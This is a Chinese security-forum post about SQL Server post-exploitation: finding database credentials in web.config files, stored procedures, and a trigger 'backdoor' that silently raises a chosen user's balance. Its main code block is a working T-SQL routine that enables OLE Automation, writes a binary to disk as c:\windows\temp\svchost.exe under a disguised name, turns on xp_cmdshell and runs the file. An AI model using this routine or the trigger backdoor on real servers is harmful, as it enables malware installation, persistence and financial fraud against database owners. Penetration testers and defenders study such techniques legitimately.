安全矩阵

 找回密码
 立即注册
搜索
查看: 3683|回复: 0

SQL Server 在(后)渗透过程中遇到问题的处理

[复制链接]

98

主题

207

帖子

955

积分

高级会员

Rank: 4

积分
955
发表于 2020-8-25 09:57:57 | 显示全部楼层 |阅读模式
SQL Server 在(后)渗透过程中遇到问题的处理
前面是铺垫,对熟悉SQLServer的同学请直接拉到#3
关键字:触发器 后门
1. SQL Server凭证认证•登陆方式分为两种:
•账号密码登录•Windows凭证认证

•如何拿到SQL Server凭证

•通过翻阅已拿到网站源码,查找里面的SQL Server的凭证。如在 ASP.Net 中一般在web.config中。
特征:Server=sqlserver服务地址;uid=用户名;pwd=用户名密 码;database=数据库•通过已有凭证登录。window身份验证字符串不需要带sqlserver的用户名与密码特征:
Server=sqlserver服务地址;Database=数据库;Trusted_Connection=Yes;Connect Timeout=90•SQL Server 高权限用户sa用户为SQL Server数据库默认的超级用户。权限范围:
•对任意数据库表字段进行增删查改。•执行储存过程。•etc..
2. 储存过程存储过程(stored procedure)是一组为了完成特定功能的SQL语句集合,经编译后存储在服务器端的数据库中,利用存储过程可以加速SQL语句的执行。
自定义存储过程,由用户创建并能完成某一特定功能的存储过程,存储过程既可以有参数又有返回值,但是它与函数不同,存储过程的返回值只是指明执行是否成功,
存储过程并不能像函数那样被直接调用,只能利用 execute 来执行存储过程。
•储存过程创建语法

•创建储存过程范例




•系统内置的储存过程



3. SQL Server触发器后门•什么是SQL Server的触发器?触发器对表进行插入、更新、删除的时候会自动执行的特殊存储过程。触发器一般用在check约束更加复杂的约束上面。触发器和普通的存储过程的区别是:触发器是当对某一个表进行操作。诸如:update、insert、delete这些操作的时候,系统会自动调用执行该表上对应的触发器。SQL Server 2005中触发器可以分为两类:DML触发器和DDL触发器,其中DDL触发器它们会影响多种数据定义语言语句而激发,这些语句有create、alter、drop语句。
•触发器语法


•触发器后门PoC


插入一个触发器,当数据库对Users表进行select操作时,我们对Users表中Username为myadmin的用户更新字段banlance为1000•通过系统内置储存过程写二进制文件
  1. EXEC sp_configure 'Ole Automation Procedures',1;reconfigure;DECLARE @FileData VARBINARY(MAX);
  2. DECLARE @Path varchar(2000);
  3. DECLARE @Obj INT;
  4. SELECT @FileData =0x0123455 ;
  5. set @Path = 'c:\\windows\\temp\\svchost.exe';
  6. EXEC sp_OACreate 'ADODB.Stream' , @Obj OUTPUT;
  7. EXEC sp_OASetProperty @Obj ,'Type',1;
  8. EXEC sp_OAMethod @Obj,'Open';EXEC sp_OAMethod @Obj,'Write', NULL, @FileData;
  9. EXEC sp_OAMethod @Obj,'SaveToFile', NULL, @Path, 2;
  10. EXEC sp_OAMethod @Obj,'Close';
  11. EXEC sp_OADestroy @Obj;
  12. EXEC sp_configure 'show advanced options', 1;
  13. RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;
  14. RECONFIGURE;Exec xp_cmdshell 'c:\\windows\\temp\\svchost.exe';--
复制代码


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 05:51 , Processed in 0.012370 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表